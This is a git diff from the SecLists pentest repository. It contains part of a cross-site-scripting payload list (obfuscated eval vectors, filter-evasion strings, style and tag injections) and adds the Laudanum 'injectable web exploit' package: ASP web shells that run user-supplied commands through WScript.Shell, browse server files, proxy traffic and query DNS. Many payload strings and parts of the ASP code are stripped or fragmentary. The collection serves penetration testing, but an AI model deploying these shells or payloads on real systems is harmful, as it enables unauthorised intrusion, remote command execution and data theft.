$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) +Exploit Description: This time $ is used to obfuscate the self-executing payload trigger. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 9 +Exploit Name: Self-contained XSS variant 9 +Exploit String: evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) +Exploit Description: This more than sophisticated vector is hard to explain - it' creator did here: http://sla.ckers.org/forum/read.php?2,13209,page=2#msg-13409 +Exploit Tags: general, self contained, shuffled +Author Name: PHPIDS Group + +Self-containing XSS with no dots +Exploit Name: Self-containing XSS with no dots +Exploit String: with(location)with(hash)eval(substring(1)) +Exploit Description: This vector uses with() to activate the payload behind the fragment identifier. No dots are used to enable easier filter evasion. +Exploit Tags: general, super short, self contained +Author Name: ma1 + +Spaces/Meta Chars +Exploit Name: Spaces/Meta Chars +Exploit String:+Exploit Description: Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word ”javascript:” - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the ”javascript:” keyword. The actual reality is you can have any char from 1-32 in decimal). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +SSI +Exploit Name: SSI +Exploit String: +Exploit Description: SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues. +Exploit Tags: general, evil tags, obfuscated, SSI, injection +Author Name: ha.ckers.org + +STYLE +Exploit Name: STYLE +Exploit String: +Exploit Description: STYLE tag (Older versions of Netscape only) +Exploit Tags: general, evil tags, style injection, gecko +Author Name: ha.ckers.org + +Style injection via content and double-eval +Exploit Name: Style injection via content and double-eval +Exploit String: + +Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed. +Exploit Tags: general, onfuscated, style injection +Author Name: .mario + +STYLE w/Anonymous HTML +Exploit Name: STYLE w/Anonymous HTML +Exploit String:
+Exploit Description: Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter) +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +STYLE w/background +Exploit Name: STYLE w/background +Exploit String: +Exploit Description: STYLE tag using background. +Exploit Tags: general, evil tags, injection, internet explorer +Author Name: ha.ckers.org + +STYLE w/background-image +Exploit Name: STYLE w/background-image +Exploit String: +Exploit Description: STYLE tag using background-image. +Exploit Tags: general, evil tags, internet explorer, style injection +Author Name: ha.ckers.org + +STYLE w/broken up JavaScript +Exploit Name: STYLE w/broken up JavaScript +Exploit String: +Exploit Description: STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts). +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +STYLE w/Comment +Exploit Name: STYLE w/Comment +Exploit String: +Exploit Description: STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one) +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +Stylesheet +Exploit Name: Stylesheet +Exploit String: +Exploit Description: Stylesheet +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Style-breaker using obfuscated JavaScript +Exploit Name: Style-breaker using obfuscated JavaScript +Exploit String: } +Exploit Description: This vector ends styleblocks and uses obfuscated JavaScript to create an alert. +Exploit Tags: general, html breaking, CSS breaking +Author Name: kishor + +Super basic HTML breaker 2 +Exploit Name: Super basic HTML breaker 2 +Exploit String: >"' +Exploit Description: This super basic vector breaks HTML attributes + +Exploit Tags: general, basic, super short, html breaking +Author Name: .mario + +Super short XSS variant 1 +Exploit Name: Super short XSS variant 1 +Exploit String: a=alert + +a(0) +Exploit Description: This extremely short XSS vector works only when newlines can be injected. +Exploit Tags: general, super short +Author Name: .mario + +Super short XSS variant 2 +Exploit Name: Super short XSS variant 2 +Exploit String: A=alert;A(1) +Exploit Description: This extremely short XSS vector works with out the need for newlines to be injected, +Exploit Tags: super short, general, basic +Author Name: -unknown- + +TABLE +Exploit Name: TABLE +Exploit String:
+Exploit Description: Table background (who would have thought tables were XSS targets... except me, of course). +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +TD +Exploit Name: TD +Exploit String:
+Exploit Description: TD background. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Textarea-breaker with mouseover +Exploit Name: Textarea-breaker with mouseover +Exploit String:MOVE MOUSE OVER THIS AREA+Exploit Description: This vector breaks textareas and creates an element reacting on mouveover events. +Exploit Tags: general, html breaking, obfuscated, user interaction +Author Name: kishor + +Unicode encoded script tags +Exploit Name: Unicode encoded script tags +Exploit String: '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +Exploit Description: This vector uses unicode encoded codepoints to create a script tag producing an alert. +Exploit Tags: general, basic, obfuscated, evil tags +Author Name: OWASP + +URL breaker for double quotes +Exploit Name: URL breaker for double quotes +Exploit String: http://aa"> +Exploit Description: This vector breaks double quoted URL input +Exploit Tags: URL breaking, general, basic, html breaking +Author Name: .mario + +URL breaker for single quotes +Exploit Name: URL breaker for single quotes +Exploit String: http://aa'> +Exploit Description: This vector breaks single quoted URL input +Exploit Tags: URL breaking, basic, general, html breaking +Author Name: .mario + +URL encoded image source +Exploit Name: URL encoded image source +Exploit String: >%22%27>]]> +Exploit Description: Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XSS Quick Test +Exploit Name: XSS Quick Test +Exploit String: '';!--" =&{()} +Exploit Description: If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for diff --git a/README b/README index d4186e8..2e225aa 100644 --- a/README +++ b/README @@ -1,6 +1,6 @@ SecLists is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more. -If you have any ideas for things we should include, please send them to daniel@danielmiessler.com. Also note that any lists that have been meticulously assembled by someone else will only be used with permission of the creator. +If you have any ideas for things we should include, please send them to daniel@danielmiessler.com or jhaddix@securityaegis.com. Also note that any lists that have been meticulously assembled by someone else will only be used with permission of the creator. This project is maintained by Daniel Miessler and Jason Haddix. @@ -8,5 +8,9 @@ Credits: - Ron Bowes of SkullSecurity for collaborating and including all his lists here - Clarkson University for their research that led to the Clarkson list +- All the authors listed in the XSS with context doc, which was found on pastebin and added to by us +- Ferruh Mavitina for the begginings of the LFI Fuzz list +- Adam Muntner and for the FuzzDB content, including all authors from the FuzzDB project +- Kevin Johnson for laudnaum shells :: diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS new file mode 100644 index 0000000..69b9a81 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS @@ -0,0 +1,17 @@ +The Team +======================================================== +- Kevin Johnson + - Project Lead + +- Justin Searle + - Core Developer + +- Tim Medin + - Core Developer + +- James Jardine + - Core Developer + +Additional Coding +======================================================== +- Robin Wood diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL new file mode 100644 index 0000000..8155770 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL @@ -0,0 +1,258 @@ +The GNU General Public License (GPL) +Version 2, June 1991 + +Copyright (C) 1989, 1991 Free Software Foundation, Inc. +59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +Everyone is permitted to copy and distribute verbatim copies +of this license document, but changing it is not allowed. + +Preamble + +The licenses for most software are designed to take away your freedom to share +and change it. By contrast, the GNU General Public License is intended to +guarantee your freedom to share and change free software--to make sure the +software is free for all its users. This General Public License applies to most +of the Free Software Foundation's software and to any other program whose +authors commit to using it. (Some other Free Software Foundation software is +covered by the GNU Library General Public License instead.) You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not price. Our +General Public Licenses are designed to make sure that you have the freedom to +distribute copies of free software (and charge for this service if you wish), +that you receive source code or can get it if you want it, that you can change +the software or use pieces of it in new free programs; and that you know you can +do these things. + +To protect your rights, we need to make restrictions that forbid anyone to deny +you these rights or to ask you to surrender the rights. These restrictions +translate to certain responsibilities for you if you distribute copies of the +software, or if you modify it. + +For example, if you distribute copies of such a program, whether gratis or for +a fee, you must give the recipients all the rights that you have. You must make +sure that they, too, receive or can get the source code. And you must show them +these terms so they know their rights. + +We protect your rights with two steps: (1) copyright the software, and (2) +offer you this license which gives you legal permission to copy, distribute +and/or modify the software. + +Also, for each author's protection and ours, we want to make certain that +everyone understands that there is no warranty for this free software. If the +software is modified by someone else and passed on, we want its recipients to +know that what they have is not the original, so that any problems introduced +by others will not reflect on the original authors' reputations. + +Finally, any free program is threatened constantly by software patents. We wish +to avoid the danger that redistributors of a free program will individually +obtain patent licenses, in effect making the program proprietary. To prevent +this, we have made it clear that any patent must be licensed for everyone's free +use or not licensed at all. + +The precise terms and conditions for copying, distribution and modification +follow. + +TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + +0. This License applies to any program or other work which contains a notice +placed by the copyright holder saying it may be distributed under the terms of +this General Public License. The "Program", below, refers to any such program or +work, and a "work based on the Program" means either the Program or any +derivative work under copyright law: that is to say, a work containing the +Program or a portion of it, either verbatim or with modifications and/or +translated into another language. (Hereinafter, translation is included without +limitation in the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not covered by +this License; they are outside its scope. The act of running the Program is not +restricted, and the output from the Program is covered only if its contents +constitute a work based on the Program (independent of having been made by +running the Program). Whether that is true depends on what the Program does. + +1. You may copy and distribute verbatim copies of the Program's source code as +you receive it, in any medium, provided that you conspicuously and appropriately +publish on each copy an appropriate copyright notice and disclaimer of warranty; +keep intact all the notices that refer to this License and to the absence of any +warranty; and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and you may at +your option offer warranty protection in exchange for a fee. + +2. You may modify your copy or copies of the Program or any portion of it, thus +forming a work based on the Program, and copy and distribute such modifications +or work under the terms of Section 1 above, provided that you also meet all of +these conditions: + + a) You must cause the modified files to carry prominent notices stating that + you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in whole or + in part contains or is derived from the Program or any part thereof, to be + licensed as a whole at no charge to all third parties under the terms of + this License. + + c) If the modified program normally reads commands interactively when run, + you must cause it, when started running for such interactive use in the most + ordinary way, to print or display an announcement including an appropriate + copyright notice and a notice that there is no warranty (or else, saying + that you provide a warranty) and that users may redistribute the program + under these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but does not + normally print such an announcement, your work based on the Program is not + required to print an announcement.) + +These requirements apply to the modified work as a whole. If identifiable +sections of that work are not derived from the Program, and can be reasonably +considered independent and separate works in themselves, then this License, and +its terms, do not apply to those sections when you distribute them as separate +works. But when you distribute the same sections as part of a whole which is a +work based on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the entire whole, +and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest your +rights to work written entirely by you; rather, the intent is to exercise the +right to control the distribution of derivative or collective works based on the +Program. + +In addition, mere aggregation of another work not based on the Program with the +Program (or with a work based on the Program) on a volume of a storage or +distribution medium does not bring the other work under the scope of this +License. + +3. You may copy and distribute the Program (or a work based on it, under +Section 2) in object code or executable form under the terms of Sections 1 and 2 +above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable source + code, which must be distributed under the terms of Sections 1 and 2 above on + a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three years, to + give any third party, for a charge no more than your cost of physically + performing source distribution, a complete machine-readable copy of the + corresponding source code, to be distributed under the terms of Sections 1 + and 2 above on a medium customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer to + distribute corresponding source code. (This alternative is allowed only for + noncommercial distribution and only if you received the program in object + code or executable form with such an offer, in accord with Subsection b + above.) + +The source code for a work means the preferred form of the work for making +modifications to it. For an executable work, complete source code means all +the source code for all modules it contains, plus any associated interface +definition files, plus the scripts used to control compilation and installation +of the executable. However, as a special exception, the source code distributed +need not include anything that is normally distributed (in either source or +binary form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component itself +accompanies the executable. + +If distribution of executable or object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the source code +from the same place counts as distribution of the source code, even though third +parties are not compelled to copy the source along with the object code. + +4. You may not copy, modify, sublicense, or distribute the Program except as +expressly provided under this License. Any attempt otherwise to copy, modify, +sublicense or distribute the Program is void, and will automatically terminate +your rights under this License. However, parties who have received copies, or +rights, from you under this License will not have their licenses terminated so +long as such parties remain in full compliance. + +5. You are not required to accept this License, since you have not signed it. +However, nothing else grants you permission to modify or distribute the Program +or its derivative works. These actions are prohibited by law if you do not +accept this License. Therefore, by modifying or distributing the Program (or any +work based on the Program), you indicate your acceptance of this License to do +so, and all its terms and conditions for copying, distributing or modifying the +Program or works based on it. + +6. Each time you redistribute the Program (or any work based on the Program), +the recipient automatically receives a license from the original licensor to +copy, distribute or modify the Program subject to these terms and conditions. +You may not impose any further restrictions on the recipients' exercise of the +rights granted herein. You are not responsible for enforcing compliance by third +parties to this License. + +7. If, as a consequence of a court judgment or allegation of patent infringement +or for any other reason (not limited to patent issues), conditions are imposed +on you (whether by court order, agreement or otherwise) that contradict the +conditions of this License, they do not excuse you from the conditions of this +License. If you cannot distribute so as to satisfy simultaneously your +obligations under this License and any other pertinent obligations, then as a +consequence you may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by all those +who receive copies directly or indirectly through you, then the only way you +could satisfy both it and this License would be to refrain entirely from +distribution of the Program. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply and the +section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any patents or +other property right claims or to contest validity of any such claims; this +section has the sole purpose of protecting the integrity of the free software +distribution system, which is implemented by public license practices. Many +people have made generous contributions to the wide range of software +distributed through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing to +distribute software through any other system and a licensee cannot impose that +choice. + +This section is intended to make thoroughly clear what is believed to be a +consequence of the rest of this License. + +8. If the distribution and/or use of the Program is restricted in certain +countries either by patents or by copyrighted interfaces, the original copyright +holder who places the Program under this License may add an explicit +geographical distribution limitation excluding those countries, so that +distribution is permitted only in or among countries not thus excluded. In such +case, this License incorporates the limitation as if written in the body of +this License. + +9. The Free Software Foundation may publish revised and/or new versions of the +General Public License from time to time. Such new versions will be similar in +spirit to the present version, but may differ in detail to address new problems +or concerns. + +Each version is given a distinguishing version number. If the Program specifies +a version number of this License which applies to it and "any later version", +you have the option of following the terms and conditions either of that version +or of any later version published by the Free Software Foundation. If the +Program does not specify a version number of this License, you may choose any +version ever published by the Free Software Foundation. + +10. If you wish to incorporate parts of the Program into other free programs +whose distribution conditions are different, write to the author to ask +for permission. For software which is copyrighted by the Free Software +Foundation, write to the Free Software Foundation; we sometimes make exceptions +for this. Our decision will be guided by the two goals of preserving the free +status of all derivatives of our free software and of promoting the sharing and +reuse of software generally. + +NO WARRANTY + +11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE +PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED +IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS +IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT +NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL +ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE +PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, +SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY +TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF +THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER +PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README new file mode 100644 index 0000000..2a301ae --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/README @@ -0,0 +1,35 @@ +Laudanum: Injectable Web Exploit Code v0.4 + +By Kevin Johnson Laudanum ASP DNS Access + + + + + + +DNS Query 0.1
+<% + +' dns query types as defined as by windows nslookup +qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",") +qtype = UCase(Request.Form("type")) + +' see if the query type is valid, if it isn't then set it. +validtype = 0 +for i = lbound(qtypes) to ubound(qtypes) + if qtype = qtypes(i) then + validtype = 1 + Exit For + end if +next +if validtype = 0 then qtype = "ANY" + +%> + +<% + +' get the query +query = trim(Request.Form("query")) +' the query must be sanitized a bit to try to make sure the shell doesn't hang +query = replace(query, " ", "") +query = replace(query, ";", "") + +if len(query) > 0 then + command = "nslookup -type=" & qtype & " " & query + Set objWShell = Server.CreateObject("WScript.Shell") + Set objCmd = objWShell.Exec(command) + strPResult = objCmd.StdOut.Readall() + set objCmd = nothing: Set objWShell = nothing + %><% + Response.Write command & "
<% +end if +%> +
" + Response.Write replace(strPResult,vbCrLf,"
") + %>
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp new file mode 100644 index 0000000..cc0faff --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp @@ -0,0 +1,179 @@ +<%@Language="VBScript"%> +<%Option Explicit%> +<%Response.Buffer = True%> +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin JohnsonLaudanum ASP File Browser + + + +Laudanum File Browser 0.1
+ +<% +' get the path to work with, if it isn't set or valid then start with the web root +' goofy if statement is used since vbscript doesn't use short-curcuit logic +path = trim(Request.QueryString("path")) +if len(path) = 0 then + path = fso.GetFolder(Server.MapPath("\")) +elseif not fso.FolderExists(path) then + path = fso.GetFolder(Server.MapPath("\")) +end if + +set folder = fso.GetFolder(path) + +' Special locations, webroot and drives +%>Other Locations: <% +for each i in fso.Drives + if i.IsReady then + %><%=i.DriveLetter%>: <% + end if +next +%>">web root
<% + +' Information on folder +%>Listing of: <% +list = split(folder.path, "\") +temppath = "" +for each i in list + temppath = temppath & i & "\" + %><%=i%>\ <% +next +%>
<% + +' build table for listing +%>+
+Name Size Modified Accessed Created .. <% +end if + +' Get the folders +set list = folder.SubFolders +for each i in list + %><%=i.Name%>\ <%=i.Name%> <%=FormatNumber(i.Size, 0)%> <%=i.DateLastModified%> <%=i.DateLastAccessed%> <%=i.DateCreated%>
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp new file mode 100644 index 0000000..d5db078 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp @@ -0,0 +1,454 @@ +<%@Language="VBScript"%> +<%Option Explicit%> +<%Response.Buffer = True%> +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin JohnsonLaudanum ASP Proxy + + +Fatal Error!
+ <%=Err.Number%>
+ <%=Err.Message%>
+
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + +<% +end function + +function CleanQueryString +' removes laudurl from the querystring +Dim i +Dim j +Dim s +Dim key +Dim q + + + if len(request.querystring) = 0 then + CleanQueryString = "" + exit function + end if + + ' build the request parameters + for i = 1 to request.querystring.count + key = request.querystring.key(i) + 'response.write "
key:" & key + if key = "laudurl" then + ' if the key is laudurl, we need check if there is a ? in the string since + ' it may have its own query string that doesn't get parsed properly. + s = split(request.querystring("laudurl"), "?") + if ubound(s) > lbound(s) then + ' laudurl contains a ?, it must be manually parsed + key = left(s(1), instr(s(1), "=") - 1) + q = q & "&" & key & "=" & mid(s(1), len(key) + 2) + end if + else + for j = 1 to request.querystring(key).count + 'response.write "
-value:" & request.querystring(key)(j) + q = q & "&" & key & "=" & request.querystring(key)(j) + next + end if + next + + if len(q) > 0 then + CleanQueryString = "?" & mid(q, 2) + else + CleanQueryString = "" + end if +end function + +function CleanFormValues() +Dim r + Set r = New RegExp + r.IgnoreCase = true + r.Global = true + + ' remove the laudurl paramater + r.Pattern = "laudurl=[^&]+($|&)" + CleanFormValues = r.Replace(request.form, "") + Set r = nothing +end function + +sub ParseUrl() +' parses the url into the global variables +Dim urltemp +Dim url + + 'get the url, it may be in the querystring for a get or from a form in a post + url = Request.QueryString("laudurl") + if url = "" then + url = Request.Form("laudurl") + end if + + if url = "" then + urlscheme = "" + urlhost = "" + urlport = "" + urlpath = "" + urlfile = "" + urlquery = "" + exit sub + end if + + ' Parse the url and break it into its components + ' this is done so it can be used to rewrite the page + + ' ensure the url has a scheme, if it doesn't then assume http + if instr(url,"://") = 0 then url = "http://" + url + + ' Get the scheme + urlscheme = split(url, "://")(0) & "://" + + ' urltemp is used to hold the remainder of the url as each portion is parsed + urltemp = mid(url, len(urlscheme) + 1) + 'get the host + if instr(urltemp, "/") = 0 then + ' there is no path so all that is left is the host + urlhost = urltemp + urlport = "" + urlpath = "/" + urlfile = "" + urlport = "" + else + ' there is more that just the hostname remaining + urlhost = left(urltemp, instr(urltemp, "/") - 1) + urltemp = mid(urltemp, len(urlhost) + 1) + + ' is there a port + if instr(urlhost, ":") = 0 then + ' no port + urlport = "" + else + ' there is a port + arr = split(urlhost, ":") + urlhost = arr(0) + urlport = ":" & arr(1) + end if + + ' all that is left is the path and the query + ' is there a query? + if instr(urltemp, "?") = 0 then + ' no query + urlpath = urltemp + 'urlquery = "" + else + 'Response.Write "
" & urltemp & "
" + urlpath = left(urltemp, instr(urltemp, "?") - 1) + 'urlquery = mid(urltemp, instr(urltemp, "?") + 1) + end if + + if right(urlpath, 1) = "/" then + urlfile = "" + else + ' we need to get the path and the file + urltemp = split(urlpath, "/") + urlfile = urltemp(ubound(urltemp)) + urlpath = left(urlpath, len(urlpath) - len(urlfile)) + end if + end if + + urlquery = CleanQueryString + + 'response.write "
scheme: " & urlscheme + 'response.write "
host: " & urlhost + 'response.write "
port: " & urlport + 'response.write "
path: " & urlpath + 'response.write "
file: " & urlfile + 'response.write "
query: " & urlquery + 'response.write "
full: " & FullUrl() + 'response.end +end sub + +function FullUrl() + FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery +end function + +sub RewriteHeaders() +Dim i +Dim header +Dim headervalue +Dim regexdomain +Dim regexpath + + ' setup a regular expression to clean the cookie's domain and path + Set regexdomain = New RegExp + regexdomain.IgnoreCase = true + regexdomain.Global = true + ' rewrite images and links - absolute reference + regexdomain.Pattern = "domain=[\S]+" + + Set regexpath = New RegExp + regexpath.IgnoreCase = true + regexpath.Global = true + ' rewrite images and links - absolute reference + regexpath.Pattern = "path=[\S]+" + + ' go through each header + for each i in Split(http.getAllResponseHeaders, vbLf) + ' Break on the \x0a and remove the \x0d if it exists + i = Replace(i, vbCr, "") + ' make sure it is a header and value + if instr(i, ":") > 0 then + ' break the response headers into header and value + header = trim(Left(i, instr(i, ":") - 1)) + header = replace(header, "_", "-") + headervalue = trim(Right(i, len(i) - instr(i, ":"))) + + ' don't add these two header types since they are handled automatically + if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then + if lcase(header) = "set-cookie" then + ' strip the domain from the cookie + headervalue = regexdomain.replace(headervalue, "") + ' strip the path from the cookie + headervalue = regexpath.replace(headervalue, "") + headervalue = trim(headervalue) + end if + response.AddHeader header, headervalue + end if + end if + next + + Set regexdomain = nothing + Set regexpath = nothing +end sub + +' TODO: Add authentication support so it will work behind a proxy +' IPs are enterable as individual addresses TODO: add CIDR support +allowedIPs = "192.168.0.1,127.0.0.1,::1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' +' make sure the ip is allowed +' TODO: change this to 0 for production, it is 1 for testing +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + exit for + end if +next +' send a 404 if the IP Address is not allowed +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + + +'initialize variables +Set http = nothing +Set regex = nothing +Set stream = nothing + +' Define Constants +const useMSXML2 = 0 +const chunkSize = 1048576 ' 1MB + +' parse the url into its parts +ParseUrl() + +' check if there is a valid url +if len(FullUrl) = 0 then + ' no url to proxy, give `em the boring default page + + ' Default layout of the page + ' First thing you get when you hit the page without giving it a URL + %> + + +Laudanum ASP Proxy + + + + +Laudanum ASP Proxy
+ + +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + <% + + Response.End() +end if + +' Let's get our Proxy on!!! +' define the request type +if useMSXML2 = 1 then + Set http = Server.CreateObject("MSXML2.XMLHTTP") +else + Set http = Server.CreateObject("Microsoft.XMLHTTP") +end if + +' get the request type +method = Request.ServerVariables("REQUEST_METHOD") + +' setup the request, false means don't send it yet +http.Open method, FullUrl, False + +' send the request +if method = "POST" then + params = CleanFormValues + http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" + http.setRequestHeader "Content-length", len(params) + http.setRequestHeader "Connection", "close" + http.Send(params) +else + http.Send +end if + +' Replace the normal headers with the ones from the response +Response.Clear +contenttype = http.getResponseHeader("Content-Type") +Response.ContentType = contenttype + +' rewrite the headers. Takes headers and passes them to new request +RewriteHeaders() + +' how to respond? is it text or is it something else? +if lcase(left(contenttype, 4)) = "text" then + ' response is text, so we need to rewrite it, but that's later + + + ' do the rewriting + body = http.responseText + + Set regex = New RegExp + regex.IgnoreCase = true + regex.Global = true + + ' rewrite images and links - absolute reference + s = urlscheme & urlhost & urlport + regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") + + ' rewrite images and links - full reference + regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") + + ' rewrite images and links - absolute reference + s = urlscheme & urlhost & urlport & urlpath + regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" + body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") + + + ' rewrite forms - absolute reference + s = urlscheme & urlhost & urlport + regex.Pattern = "(\+' *** Updated and fixed by Tim Medin
") + set wshell = CreateObject("WScript.Shell") + Set objCmd = wShell.Exec(cmd) + strPResult = objCmd.StdOut.Readall() + + response.write "" & replace(replace(strPResult,"<","<"),vbCrLf,"
" + + set wshell = nothing +end if + +%> + +
") & "Laundanum ASP Shell + + +
+ +Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
